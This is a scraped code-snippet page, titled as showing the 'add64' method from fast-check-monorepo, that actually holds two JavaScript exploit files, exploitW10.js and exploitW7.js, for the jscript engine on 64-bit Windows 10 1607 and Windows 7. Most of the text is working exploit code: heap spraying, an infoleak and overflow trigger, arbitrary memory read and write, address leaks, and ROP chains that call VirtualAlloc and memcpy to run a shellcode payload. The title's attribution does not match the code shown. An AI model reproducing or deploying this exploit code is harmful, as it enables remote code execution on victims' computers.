How to use add64 method in fast-check-monorepo

Best JavaScript code snippet using fast-check-monorepo

exploitW10.js

Source:exploitW10.js Github

copy

Full Screen

...53 mantissa = (dwh&0xfffff)*1.0/Math.pow(2, 20) + dwl*1.0/Math.pow(2, 52);54 }55 return sign*exponent*mantissa;56}57function add64(qw, value) {58 var h = qw.dwh;59 var l = qw.dwl+value;60 if (l >= 0x100000000) {61 l = fixNeg(l&0xffffffff);62 h = h+1;/////63 }64 return {dwh:h, dwl:l};65}66function sub64(qw, value) {67 var h = qw.dwh;68 var l = qw.dwl;69 if (l < value) {70 h = h-1;/////71 l = (0x100000000+l) - value;72 } else {73 l = l - value;74 }75 return {dwh:h, dwl:l};76}77function shr4_64(qw) {78 var l = qw.dwl;79 var h = qw.dwh;80 var tmp = h&0x0F;81 h = h>>4; 82 l = fixNeg((tmp<<28) | (l>>>4));83 return {dwh:h, dwl:l};84}85function equal64(qw1, qw2) {86 return qw1.dwh==qw2.dwh && qw1.dwl==qw2.dwl;87}88var namesLen = 8000;89var names = Array(namesLen);90for (var i=0; i<namesLen; i++) {91 names[i] = alloc_string(0x50, i+"_NAME");92}93//win 10 1607 svchost 94var var1 = names[373]; var var1Hash = 0xb01db001; var var1Offset = 0x10+0x98*0;95var var2 = names[432]; var var2Hash = 0xc9f6300d; var var2Offset = 0x10+0x98*1;96var var3 = names[106]; var var3Hash = 0x6ee01c13; var var3Offset = 0x10+0x98*2;97var var4 = names[559]; var var4Hash = 0x70baf01f; var var4Offset = 0x10+0x98*3;98var var5 = names[618]; var var5Hash = 0x8a93702b; var var5Offset = 0x10+0x98*4;99var var6 = names[353]; var var6Hash = 0xbc699c37; var var6Offset = 0x10+0x98*5;100var mObj;101var fakeVARObjsAddr;102function readDW(qw) {103 mObj[var2] = mObj[var3]; 104 mObj[var1] = qwToDoubleIEEE754(add64(qw, 4));105 mObj[var2] = mObj[var4];106 var highBits = mObj[var1].length*2;107 mObj[var2] = mObj[var3];108 mObj[var1] = qwToDoubleIEEE754(add64(qw, 3));109 mObj[var2] = mObj[var4];110 var lowBit = (mObj[var1].length&0x80)>>7;111 return highBits+lowBit;112}113function readQW(qw) {114 var l = readDW(qw);115 var h = readDW(add64(qw, 4));116 return {dwh:h, dwl:l};117}118function writeQW(qwAddr, qwValue) {119 mObj[var2] = mObj[var3];120 mObj[var1] = qwToDoubleIEEE754(add64(fakeVARObjsAddr, var6Offset+8));121 mObj[var2] = mObj[var5];122 mObj[var1] = qwToDoubleIEEE754(qwValue);123 mObj[var2] = mObj[var3];124 mObj[var1] = qwToDoubleIEEE754(sub64(qwAddr, 0x10));125 mObj[var2] = mObj[var5];126 mObj[var1] = mObj[var6];127}128///////////////////////////////////////////////////////////129// STAGE 1 //130///////////////////////////////////////////////////////////131log("[x] STAGE 1: Begin");132// Heap Spraying with strings133var arrayStringsLen = 1000;134var leakSize = 0x5000 - 0x3C;135var arrayStrings = new Array(arrayStringsLen);136var sA = alloc_string(leakSize, "A");137for (var i=0; i<arrayStringsLen; i++) {138 arrayStrings[i] = sA.substr(0, sA.length);139}140for (var i=1; i<arrayStringsLen; i+=2) {141 arrayStrings[i] = null;142}143CollectGarbage();144// Triggering the infoleak145var re = new RegExp(Array(0x2A).join('()'));146var target_str = arrayStrings[arrayStringsLen/2];147target_str.search(re);148RegExp.input = (leakSize+0x800)/2;149var leak = RegExp.lastParen;150// Finding the leaked object address151/*152var offset = (leakSize-0x100)/2;153var tmp = read_dword(leak, offset);154while(tmp) {155 offset += 2;156 tmp = read_dword(leak, offset);157}158log("[x] Found null at offset: " + offset.toString(16));159//ofset 0x27e2160offset = offset + 2; // alignment161*/162var offset = 0x27E4;163// Verifying the next chunk has the proper size (checking if it had A's before being free)164tmp = read_dword(leak, offset + 0x30); 165var freedChunkAddr;166if (tmp == 0x00410041) {167 // Next chunck have size 0x5000168 var c = {dwh:read_dword(leak, (offset + 0x1C)+4/2), dwl:read_dword(leak, (offset + 0x1C))};169 freedChunkAddr = c;170} else {171 // Next chunk doesnt have size 0x5000172 var c = {dwh:read_dword(leak, (offset + 0x1C)+4/2), dwl:read_dword(leak, (offset + 0x1C))};173 freedChunkAddr = sub64(c, 0x5000 + 0x5000);174}175fakeVARObjsAddr = add64(freedChunkAddr, 0x10);176// Making the data that will be loaded at the leaked address177var payload = unescape("PAYLOAD");178var arrayFOLen = arrayStringsLen/2;179var arrayFO = new Array(arrayFOLen);180var fakeVariables = 181// Filler bytes182dwordToUnicode([0x00000000, 0x00000000, 0x00000000, 0x00000000])+183// Fake linked-list of objects pointed by a hashtable:184 //Object 1:185 dwordToUnicode([186 0x00000003, 0x00000000, 0x0000C0FE, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 187 var1Hash, 0x00000050, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000]) 188 + var1 + dwordToUnicode([0x00000000, 0x00000000])+189 //Object 2:190 dwordToUnicode([191 0x0000400C, 0x00000000, fakeVARObjsAddr.dwl, fakeVARObjsAddr.dwh, 0x00000000, 0x00000000, 192 0x00000000, 0x00000000, var2Hash, 0x00000050, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 193 0x00000000, 0x00000000]) + var2 + dwordToUnicode([0x00000000, 0x00000000])+194 //Object 3:195 dwordToUnicode([196 0x00000003, 0x00000000, 0x00000000, 0x00000000, 0x00000005, 0x00000000, 0x00000000, 0x00000000, 197 var3Hash, 0x00000050, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000]) 198 + var3 + dwordToUnicode([0x00000000, 0x00000000])+199 //Object 4:200 dwordToUnicode([201 0x00000003, 0x00000000, 0x00000000, 0x00000000, 0x00000008, 0x00000000, 0x00000000, 0x00000000, 202 var4Hash, 0x00000050, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000]) 203 + var4 + dwordToUnicode([0x00000000, 0x00000000])+204 //Object 5:205 dwordToUnicode([206 0x00000003, 0x00000000, 0x00000000, 0x00000000, 0x0000400C, 0x00000000, 0x00000000, 0x00000000, 207 var5Hash, 0x00000050, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000]) 208 + var5 + dwordToUnicode([0x00000000, 0x00000000])+209 //Object 6:210 dwordToUnicode([211 0x00000003, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000,212 var6Hash, 0x00000050, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000]) 213 + var6 + dwordToUnicode([0x00000000, 0x00000000])+214 // Space to leak data215 dwordToUnicode([0x41414141, 0x41414141, 0x41414141, 0x41414141, 0x41414141, 0x41414141])+216 // Payload217 payload218;219var spaceToLeakAddr = add64(fakeVARObjsAddr, 0x10+0x98*6);220var payloadAddr = add64(fakeVARObjsAddr, 0x10+0x98*6+0x18);221// Filling the leaked-address hole222var ss = alloc_string(leakSize, fakeVariables);223for (var i=0; i<arrayFOLen; i++) {224 arrayFO[i] = ss.substr(0, ss.length);225}226log("[x] STAGE 1: Done!");227///////////////////////////////////////////////////////////228// STAGE 2 //229///////////////////////////////////////////////////////////230log("[x] STAGE 2: Begin");231// For later filling some potential holes232var nBlockspf = 0x40;233var objspf = Array(nBlockspf);234for (var ii=0; ii<nBlockspf; ii++){235 var o = new Object();236 for (var i=0; i<300; i++) {237 o[names[i]] = i;238 }239 objspf[ii] = o;240}241// Heap Spraying - LFH with HashTables242log("[x] Pre HeapSpray!");243var nBlocks = 0x1000;244var iniFreeBlocks = 0x200;245var nFreeBlocks = 0xC00;246var objshs = Array(nBlocks);247for (var ii=0; ii<nBlocks; ii++){248 var o = new Object();249 for (var i=0; i<300; i++) {250 o[names[i]] = i; // Allocs 0x400251 }252 objshs[ii] = o;253}254for (var ii=0; ii<nBlocks; ii++){255 for (var i=300; i<700; i++) {256 objshs[ii][names[i]] = i; // Reallocs 0x2000257 }258}259log("[x] HeapSpray: making holes");260for (var ii=iniFreeBlocks; ii<iniFreeBlocks+nFreeBlocks; ii+=0x10){261 for (var i=700; i<namesLen; i++) {262 objshs[ii][names[i]] = i; // Reallocs 0x10000263 }264}265CollectGarbage();266log("[x] HeapSpray done!");267// Filling some potential holes268for (var ii=0; ii<nBlockspf; ii++){269 for (var i=300; i<700; i++) {270 objspf[ii][names[i]] = i; 271 }272}273// Defining the function exploit() called inside the last callback that triggers the overflow274var arrayExLen = 0x100;275var arrayExMidPoint = 0xB4; //0xB4 allocs one of 0x21c0 y another one of 0x2d0276var arrayEx = new Array(arrayExLen);277function exploit() {278 // Constructing the object to trigger the overflow279 for (var i=0; i<arrayExMidPoint-1; i++) {280 arrayEx[i] = i;281 }282 var objAfterOverflow = {toString:function() {283 log("[x] Overflow Done!");284 try { 285 // Finding the overflowed hashtable286 var found = false;287 for (var ii=0; ii<nBlocks; ii++){288 if (objshs[ii][var1] == 0xC0FE) {289 mObj = objshs[ii];290 found = true;291 break;292 }293 }294 if (!found) {295 return false;296 }297 log("[x] Found!! MagicNumber: 0x" + mObj[var1].toString(16));298 // Fixing LFH block - Win10 1607 x64 Segment Heap 299 mObj[var6] = mObj;300 var v = readQW(add64(fakeVARObjsAddr, 0x10+0x98*5 + 0x08));301 var nameTbl = readQW(add64(v, 0x08));302 var nameList = readQW(add64(nameTbl, 0x10));303 var ovflBlock = readQW(add64(nameList, 0x38));304 // Fixing the overflow on the LFH - Win10 1607 x64 Segment Heap305 // Fixing value used as offset (0x05, always?)306 var offsetAddr = sub64(ovflBlock, 0x40);307 writeQW(offsetAddr, {dwh:0x00, dwl:0x05});308 // Fixing unused bytes 0x2200-0x21C0 ---> 0x4040 (not overwrited, so no need to fix it)309 log("[x] Fixing LFH block! - done!");310 // Fixing second overflowed buffer //WIN10 311 // Leaking stack pointer312 var stackPtr = readQW(add64(readQW(add64(nameTbl, 0x18)), 0x50));313 // Leaking jscript Address - Win10 1607 x64 Segment Heap314 var jscript = sub64(readQW(nameTbl), 0x8fa70); //offset to jscript!NameTbl::vtable315 // Finding ret address = jscript!ConvertToString+0x5b - Win10 1607 x64 Segment Heap316 var retValue = add64(jscript, 0x2ee17);317 // Adjusting stack pointer (stackPtr variable) so it points to the previous ret address318 tmp = readQW(stackPtr);319 while (!equal64(tmp, retValue)) {320 stackPtr = add64(stackPtr, 0x08);321 tmp = readQW(stackPtr);322 }323 // Leaking VirtualAlloc and memcpy addresses - Win10 1607 x64 Segment Heap324 var virtualProtect = readQW(add64(jscript, 0x98e00));325 var kernel32 = sub64(virtualProtect, 0x1bc10);326 var virtualAlloc = add64(kernel32, 0x1b210);327 var memcpy = readQW(add64(kernel32, 0x76660));328 var ntdll = sub64(memcpy, 0xab400);329 // Windows 10 1607 (x64) ROP330 // Loading ROP directly into the stack331 // Overwriting a return address that triggers the execution of the ROP chain332 writeQW(add64(stackPtr, 0x140), add64(jscript, 0x33377)); // # FF E0 # JMP RAX333 writeQW(add64(stackPtr, 0x138), memcpy); // memcpy()334 writeQW(add64(stackPtr, 0x128), {dwh:0, dwl:0x2000}); // R8 = size = 0x2000335 writeQW(add64(stackPtr, 0x120), {dwh:0, dwl:0x01}); // RCX = memdst = to be written336 writeQW(add64(stackPtr, 0x118), payloadAddr); // RDX = memsrc = payloadAddr337 writeQW(add64(stackPtr, 0x110), add64(ntdll, 0x951F0)); // # 5A 59 41 58 41 59 C3 # POP RDX # POP RCX # POP R8 # POP R9 # RET338 writeQW(add64(stackPtr, 0xE0), add64(jscript, 0x46A1)); // # 48 89 43 68 48 8B C3 48 83 C4 20 5B C3 # MOV [RBX+68], RAX # MOV RAX, RBX # ADD RSP, 20 # POP RBX # RETN339 writeQW(add64(stackPtr, 0xD8), add64(stackPtr, 0x120 - 0x68)); // RBX = ptr stack to save RAX (alloced memory)340 writeQW(add64(stackPtr, 0xB0), add64(jscript, 0x2AAA2)); // # 48 83 C4 20 5B C3 # ADD RSP, 20 # POP RBX # RETN341 writeQW(add64(stackPtr, 0xA8), virtualAlloc); // VirtualAlloc()342 writeQW(add64(stackPtr, 0xA0), {dwh:0, dwl:0x40}); // R9 = 0x40 = flProtect = PAGE_EXECUTE_READWRITE343 writeQW(add64(stackPtr, 0x98), {dwh:0, dwl:0x3000}); // R8 = 0x3000 = flAllocationType = MEM_COMMIT | MEM_RESERVE344 writeQW(add64(stackPtr, 0x90), {dwh:0, dwl:0x01}); // RCX = lpAddress = 0x00000000 = to be writen345 writeQW(add64(stackPtr, 0x88), {dwh:0, dwl:0x4000}); // RDX = 0x4000 = dwSize346 writeQW(add64(stackPtr, 0x80), add64(ntdll, 0x951F0)); // # 5A 59 41 58 41 59 C3 # POP RDX # POP RCX # POP R8 # POP R9 # RET347 writeQW(add64(stackPtr, 0x50), add64(jscript, 0x2A91D)); // # 83 63 10 00 48 83 C4 20 5B C3 # AND [RBX+10], 0 # ADD RSP, 20 # POP RBX # RETN348 writeQW(add64(stackPtr, 0x48), add64(stackPtr, 0x90 - 0x10)); // RBX = ptr stack to write 0349 writeQW(add64(stackPtr, 0x00), add64(jscript, 0x2959)); // # 48 83 C4 40 5B C3 # ADD RSP, 40 # POP RBX # RETN350 }catch(err) {351 log("[x] FHT - ERROR: " + err.name + " - " + err.message);352 }353 return "";354 }};355 var obj = {toString:function() {356 // Windows 10 1607 (x64) svchost357 arrayEx[arrayExMidPoint+ 1] = 0;358 arrayEx[arrayExMidPoint+ 2] = 0;359 arrayEx[arrayExMidPoint+ 3] = qwToDoubleIEEE754(add64(fakeVARObjsAddr, var1Offset));360 arrayEx[arrayExMidPoint+ 4] = 0;361 arrayEx[arrayExMidPoint+ 5] = qwToDoubleIEEE754(add64(fakeVARObjsAddr, var2Offset));362 arrayEx[arrayExMidPoint+ 6] = qwToDoubleIEEE754(add64(fakeVARObjsAddr, var3Offset));363 arrayEx[arrayExMidPoint+ 7] = 0;364 arrayEx[arrayExMidPoint+ 8] = qwToDoubleIEEE754(add64(fakeVARObjsAddr, var4Offset));365 arrayEx[arrayExMidPoint+ 9] = 0;366 arrayEx[arrayExMidPoint+10] = qwToDoubleIEEE754(add64(fakeVARObjsAddr, var5Offset));367 arrayEx[arrayExMidPoint+11] = 0;368 arrayEx[arrayExMidPoint+12] = qwToDoubleIEEE754(add64(fakeVARObjsAddr, var6Offset));369 arrayEx[arrayExMidPoint+13] = objAfterOverflow;370 }};371 arrayEx[0] = obj;372 // Triggering the overflow373 log("[x] Triggering Overflow!");374 Array.prototype.sort.call(arrayEx);375}376try {377 // Chaining some similar execution flows prior to the overflow to increase the odds378 var nCount = 0x20;379 var objsfh = Array(nCount);380 for (var k=0; k<nCount; k++){381 var array = new Array(arrayExLen);382 for (var i=0; i<arrayExMidPoint-1; i++) {...

Full Screen

Full Screen

exploitW7.js

Source:exploitW7.js Github

copy

Full Screen

...45 mantissa = (dwh&0xfffff)*1.0/Math.pow(2, 20) + dwl*1.0/Math.pow(2, 52);46 }47 return sign*exponent*mantissa;48}49function add64(qw, value) {50 var h = qw.dwh;51 var l = qw.dwl+value;52 if (l >= 0x100000000) {53 l = l&0xffffffff;54 h = h+1;/////55 }56 return {dwh:h, dwl:l};57}58function sub64(qw, value) {59 var h = qw.dwh;60 var l = qw.dwl;61 if (l < value) {62 h = h-1;/////63 l = (0x100000000+l) - value;64 } else {65 l = l - value;66 }67 return {dwh:h, dwl:l};68}69var namesLen = 700;70var names = Array(namesLen);71for (var i=0; i<namesLen; i++) {72 names[i] = alloc_string(0x50, i+"_NAME");73}74var var1 = names[276]; var var1Hash = 0xdb51098b; var var1Offset = 0x10+0x98*0;75var var2 = names[184]; var var2Hash = 0x113c6a11; var var2Offset = 0x10+0x98*1;76var var3 = names[254]; var var3Hash = 0xbb28f497; var var3Offset = 0x10+0x98*2;77var var4 = names[162]; var var4Hash = 0xf114551d; var var4Offset = 0x10+0x98*3;78var var5 = names[232]; var var5Hash = 0x9b00dfa3; var var5Offset = 0x10+0x98*4;79var var6 = names[140]; var var6Hash = 0xd0ec4029; var var6Offset = 0x10+0x98*5;80var mObj;81var fakeVARObjsAddr;82function readDW(qw) {83 mObj[var2] = mObj[var3]; 84 mObj[var1] = qwToDoubleIEEE754(add64(qw, 4));85 mObj[var2] = mObj[var4];86 var highBits = mObj[var1].length*2;87 mObj[var2] = mObj[var3];88 mObj[var1] = qwToDoubleIEEE754(add64(qw, 3));89 mObj[var2] = mObj[var4];90 var lowBit = (mObj[var1].length&0x80)>>7;91 return highBits+lowBit;92}93function readQW(qw) {94 var l = readDW(qw);95 var h = readDW(add64(qw, 4));96 return {dwh:h, dwl:l};97}98function writeQW(qwAddr, qwValue) {99 mObj[var2] = mObj[var3];100 mObj[var1] = qwToDoubleIEEE754(add64(fakeVARObjsAddr, var6Offset+8));101 mObj[var2] = mObj[var5];102 mObj[var1] = qwToDoubleIEEE754(qwValue);103 mObj[var2] = mObj[var3];104 mObj[var1] = qwToDoubleIEEE754(sub64(qwAddr, 0x10));105 mObj[var2] = mObj[var5];106 mObj[var1] = mObj[var6];107}108///////////////////////////////////////////////////////////109// STAGE 1 //110///////////////////////////////////////////////////////////111// Heap Spraying with strings112var arrayStringsLen = 0x100;113var arrayStrings = new Array(arrayStringsLen);114for (var i=0; i<arrayStringsLen; i++) {115 arrayStrings[i] = alloc_string(0x5000-0x18 -0x4, "A");116}117for (var i=1; i<arrayStringsLen; i+=2) {118 arrayStrings[i] = null;119 CollectGarbage();120}121// Triggering the infoleak122var re = new RegExp(Array(0x2A).join('()'));123var target_str = arrayStrings[arrayStringsLen-4];124target_str.search(re);125RegExp.input = 0x6000/2;126var leak = RegExp.lastParen;127// Finding the leaked object address128var offset = 0;129while(read_dword(leak, offset)) {130 offset += 2;131}132offset = offset + 0x14/2; //pq son caracteres unicode133var objAddr = {dwh:read_dword(leak, offset+4/2), dwl:read_dword(leak, offset)};134fakeVARObjsAddr = add64(objAddr, 8);135// Making the data that will be loaded at the leaked address136var payload = unescape("PAYLOAD");137var arrayFOLen = 0x100;138var arrayFO = new Array(arrayFOLen);139var ptrToObject2 = add64(fakeVARObjsAddr, 0xA0);140var fakeVariables = 141// Filler bytes142dwordToUnicode([0x00000000, 0x00000000, 0x00000000, 0x00000000])+143// Fake linked-list of objects pointed by a hashtable:144 //Object 1:145 dwordToUnicode([146 0x00000003, 0x00000000, 0x0000C0FE, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 147 var1Hash, 0x00000050, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000]) 148 + var1 + dwordToUnicode([0x00000000, 0x00000000])+149 //Object 2:150 dwordToUnicode([151 0x0000400C, 0x00000000, fakeVARObjsAddr.dwl, fakeVARObjsAddr.dwh, 0x00000000, 0x00000000, 152 0x00000000, 0x00000000, var2Hash, 0x00000050, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 153 0x00000000, 0x00000000]) + var2 + dwordToUnicode([0x00000000, 0x00000000])+154 //Object 3:155 dwordToUnicode([156 0x00000003, 0x00000000, 0x00000000, 0x00000000, 0x00000005, 0x00000000, 0x00000000, 0x00000000, 157 var3Hash, 0x00000050, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000]) 158 + var3 + dwordToUnicode([0x00000000, 0x00000000])+159 //Object 4:160 dwordToUnicode([161 0x00000003, 0x00000000, 0x00000000, 0x00000000, 0x00000008, 0x00000000, 0x00000000, 0x00000000, 162 var4Hash, 0x00000050, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000]) 163 + var4 + dwordToUnicode([0x00000000, 0x00000000])+164 //Object 5:165 dwordToUnicode([166 0x00000003, 0x00000000, 0x00000000, 0x00000000, 0x0000400C, 0x00000000, 0x00000000, 0x00000000, 167 var5Hash, 0x00000050, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000]) 168 + var5 + dwordToUnicode([0x00000000, 0x00000000])+169 //Object 6:170 dwordToUnicode([171 0x00000003, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000,172 var6Hash, 0x00000050, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000]) 173 + var6 + dwordToUnicode([0x00000000, 0x00000000])+174 // Space to leak data175 dwordToUnicode([0x41414141, 0x41414141, 0x41414141, 0x41414141, 0x41414141, 0x41414141])+176 // Payload177 payload178;179var spaceToLeakAddr = add64(fakeVARObjsAddr, 0x10+0x98*6);180var payloadAddr = add64(fakeVARObjsAddr, 0x10+0x98*6+0x18);181// Filling the leaked-address hole182var ss = alloc_string(0x5000-0x18 -0x4, fakeVariables);183for (var i=0; i<arrayFOLen; i++) {184 arrayFO[i] = Array(2).join(ss);185}186breakpoint("[x] STAGE 1: Done!");187///////////////////////////////////////////////////////////188// STAGE 2 //189///////////////////////////////////////////////////////////190// Heap Spraying - LFH with HashTables191var nBlocks = 0x300;192var iniFreeBlocks = 0x80;193var nFreeBlocks = 0x280;194var objshs = Array(nBlocks);195for (var ii=0; ii<nBlocks; ii++){196 var o = new Object();197 for (var i=0; i<300; i++) {198 o[names[i]] = i; 199 }200 objshs[ii] = o;201}202Array.prototype.sort.call(objshs);203for (var ii=iniFreeBlocks; ii<iniFreeBlocks+nFreeBlocks; ii+=2){204 for (var i=300; i<namesLen; i++) {205 objshs[ii][names[i]] = i;206 }207 CollectGarbage();208}209breakpoint("[x] HeapSpray done!");210// Filling some potential holes211var nBlockspf = 0x80;212var objspf = Array(nBlockspf);213for (var ii=0; ii<nBlockspf; ii++){214 var o = new Object();215 for (var i=0; i<300; i++) {216 o[i] = i;217 }218 objspf[ii] = o;219}220Array.prototype.sort.call(objspf);221breakpoint("[x] preFill done!");222// Defining the function exploit() called inside the last callback that triggers the overflow223var arrayExLen = 0x20;224var arrayExMidPoint = 0x15;225var arrayEx = new Array(arrayExLen);226function exploit() {227 // Constructing the object to trigger the overflow228 for (var i=0; i<arrayExMidPoint-1; i++) {229 arrayEx[i] = i;230 }231 var obj = {toString:function() {232 arrayEx[arrayExMidPoint+1] = 0;233 arrayEx[arrayExMidPoint+2] = 0;234 arrayEx[arrayExMidPoint+3] = 0;235 arrayEx[arrayExMidPoint+4] = qwToDoubleIEEE754(add64(fakeVARObjsAddr, var1Offset));236 arrayEx[arrayExMidPoint+5] = qwToDoubleIEEE754(add64(fakeVARObjsAddr, var2Offset));237 arrayEx[arrayExMidPoint+6] = qwToDoubleIEEE754(add64(fakeVARObjsAddr, var3Offset));238 arrayEx[arrayExMidPoint+7] = qwToDoubleIEEE754(add64(fakeVARObjsAddr, var4Offset));239 arrayEx[arrayExMidPoint+8] = qwToDoubleIEEE754(add64(fakeVARObjsAddr, var5Offset));240 arrayEx[arrayExMidPoint+9] = qwToDoubleIEEE754(add64(fakeVARObjsAddr, var6Offset));241 }}242 arrayEx[0] = obj;243 // Triggering the overflow244 breakpoint("[x] Triggering Overflow!");245 Array.prototype.sort.call(arrayEx);246 // Finding the overflowed hashtable247 breakpoint("[x] Finding the overflown HashTable!");248 for (var ii=iniFreeBlocks+1; ii<iniFreeBlocks+nFreeBlocks; ii+=2){249 if (objshs[ii][var1] == 0xC0FE) {250 mObj = objshs[ii];251 }252 }253 breakpoint("[x] Found!! MagicNumber: 0x" + mObj[var1].toString(16));254//////////////////////////////////////255 // Fixing overflowed heap256 mObj[var6] = mObj;257 var v = readQW(add64(fakeVARObjsAddr, 0x10+0x98*5 + 0x08));258 var nameTbl = readQW(add64(v, 0x08));259breakpoint("nameTbl: " + print64(nameTbl));260 var nameList = readQW(add64(nameTbl, 0x10));261 var ht1 = sub64(readQW(add64(nameList, 0x38)), 0x10);262breakpoint("ht1: " + print64(ht1));263 var key2 = readQW(add64(ht1, 0x410 + 0x08));264 var keyL = ((ht1.dwl^(ht1.dwl+0x410))>>4)^key2.dwl;265 var keyH = 0x90000000 + (key2.dwh&0xFF);266 var oldKey = {dwh:keyH, dwl:keyL};267 writeQW(add64(ht1, 0x08), oldKey);268 // Leaking stack pointer269 var stackPtr = readQW(add64(readQW(add64(nameTbl, 0x18)), 0x50));270breakpoint("stackPtr: " + print64(stackPtr));271 //stackPtr = add64(stackPtr, 0x3A88);272 breakpoint("stackPtr+offset: " + print64(stackPtr));273//////////////////////////////////////274 // Leaking jscript Address275 mObj[var2] = mObj[var3];276 mObj[var1] = qwToDoubleIEEE754(spaceToLeakAddr);277 mObj[var2] = mObj[var5];278 mObj[var1] = new Array(1);279 jscript = sub64(readQW(add64(spaceToLeakAddr, 0x10)), 0x24134);280 breakpoint("[x] jscript addr: " + print64(jscript));281//////////////////////////////////////282 // Finding ret address = jscript!ConvertToString+0x5b283 var retValue = add64(jscript, 0xcd23);284breakpoint("[x] retValue: " + print64(retValue));285 function equal64(qw1, qw2) {286 return qw1.dwh==qw2.dwh && qw1.dwl==qw2.dwl;287 }288 // Fixing stack pointer so it points to the previous ret address289 tmp = readQW(stackPtr);290 while (!equal64(tmp, retValue)) {291 stackPtr = add64(stackPtr, 0x08);292 tmp = readQW(stackPtr);293 }294breakpoint("[x] retValue found at: " + print64(stackPtr)); 295//////////////////////////////////////296 // Leaking VirtualAlloc and memcpy addresses297 var kernel32 = sub64(readQW(add64(jscript, 0xb33b0)), 0x15b00);298 var memcpy = readQW(add64(jscript, 0xb3268)); 299 var virtualAlloc = add64(kernel32, 0x15C68);300 breakpoint("[x] ROP");301 // Loading ROP directly into the stack302 // Overwriting a return address that triggers the execution of the ROP chain303 writeQW(add64(stackPtr, 0x198), add64(jscript, 0x44C15)); // # JMP RBX304 writeQW(add64(stackPtr, 0x168), add64(jscript, 0x9595)); // # ADD RSP,20 # POP RBX # RETN305 writeQW(add64(stackPtr, 0x160), add64(jscript, 0x44C15)); // # JMP RBX306 writeQW(add64(stackPtr, 0x158), memcpy); // RBX = memcpy307 writeQW(add64(stackPtr, 0x150), add64(jscript, 0x86014)); // # MOV R8, RBP # MOV RDX, R14 # CALL [RAX+18]308 writeQW(add64(stackPtr, 0x148), add64(stackPtr, 0x30 - 0x18)); // RAX = 309 writeQW(add64(stackPtr, 0x140), add64(jscript, 0xC1D0)); // # POP RAX # RETN310 writeQW(add64(stackPtr, 0x138), add64(jscript, 0x1532)); // # MOV [RAX+8], RCX # RET311 writeQW(add64(stackPtr, 0x130), add64(stackPtr, 0x190 - 8)); // RAX -> Saving RWX_Memory_Address into the stack = memdst312 writeQW(add64(stackPtr, 0x128), add64(jscript, 0xC1D0)); // # POP RAX # RETN313 writeQW(add64(stackPtr, 0x120), add64(jscript, 0x3BAAF)); // # MOV RCX, RAX # CALL R9314 writeQW(add64(stackPtr, 0x118), {dwh:0, dwl:0x2000}); // RBP = R8 = size = 0x2000315 writeQW(add64(stackPtr, 0x110), payloadAddr); // R14 = RDX = memsrc = payloadAddr316 writeQW(add64(stackPtr, 0x108), add64(jscript, 0x54DD)); // # MOV R9, RBX # ... # CALL [RDI+80]317 writeQW(add64(stackPtr, 0x100), add64(jscript, 0x6E9FA)); // RBX = R9 -> # POP RSI # RETN318 writeQW(add64(stackPtr, 0xF8), add64(jscript, 0x6E9FA)); // RSI = 319 writeQW(add64(stackPtr, 0xF0), add64(jscript, 0x5A697)); // # POP RSI # POP RBX # RETN320 writeQW(add64(stackPtr, 0xE8), add64(stackPtr, 0x40 - 0x80)); // RDI = 321 writeQW(add64(stackPtr, 0xC0), add64(jscript, 0xF0BA)); // # ADD RSP,20 # POP RDI # RETN322 writeQW(add64(stackPtr, 0xB8), add64(jscript, 0x44C15)); // # JMP RBX323 writeQW(add64(stackPtr, 0xB0), virtualAlloc); // RBX = VirtualAlloc324 writeQW(add64(stackPtr, 0xA8), add64(jscript, 0x9AF4)); // # MOV RCX, RBX # CALL RSI325 writeQW(add64(stackPtr, 0xA0), add64(jscript, 0x5A697)); // RSI -> # POP RSI # POP RBX # RETN326 writeQW(add64(stackPtr, 0x98), add64(jscript, 0x73121)); // # XOR EBX, EBX # CALL [RAX]327 writeQW(add64(stackPtr, 0x90), add64(stackPtr, 0x38)); // RAX =328 writeQW(add64(stackPtr, 0x88), add64(jscript, 0xC1D0)); // # POP RAX # RETN329 writeQW(add64(stackPtr, 0x80), {dwh:0, dwl:0x1000}); // RBX = 330 writeQW(add64(stackPtr, 0x78), add64(jscript, 0x86011)); // # MOV R9, RDI # MOV R8, RBP # MOV RDX, R14 # CALL [RAX+18]331 writeQW(add64(stackPtr, 0x70), add64(stackPtr, 0x30 - 0x18)); // RAX = 332 writeQW(add64(stackPtr, 0x68), add64(jscript, 0xC1D0)); // # POP RAX # RETN333 writeQW(add64(stackPtr, 0x60), {dwh:0, dwl:0x3000}); // RBP = R8 = 0x3000 = flAllocationType = MEM_COMMIT | MEM_RESERVE334 writeQW(add64(stackPtr, 0x58), {dwh:0, dwl:0x4000}); // R14 = RDX = 0x4000 = dwSize335 writeQW(add64(stackPtr, 0x50), add64(jscript, 0x7F69)); // # POP R14 # POP RBP # RETN336 writeQW(add64(stackPtr, 0x48), {dwh:0, dwl:0x40}); // RDI = R9 = 0x40 = flProtect = PAGE_EXECUTE_READWRITE337 writeQW(add64(stackPtr, 0x00), add64(jscript, 0x5BACE)); // # ADD RSP, 40 # POP RDI # RETN338 writeQW(add64(stackPtr, 0x40), add64(jscript, 0x7F67)); // Value for the CALL[RDI+80] -> # POP R15 # POP R14 # POP RBP # RETN339 writeQW(add64(stackPtr, 0x38), add64(jscript, 0x6E9F9)); // Value for the CALL[RAX] -> # POP RDI # POP RSI # RETN340 writeQW(add64(stackPtr, 0x30), add64(jscript, 0x5A697)); // Value for the CALL[RAX+18] -> # POP RSI # POP RBX # RETN341 breakpoint("[x] End Exploit");342}343// Chaining some similar execution flows 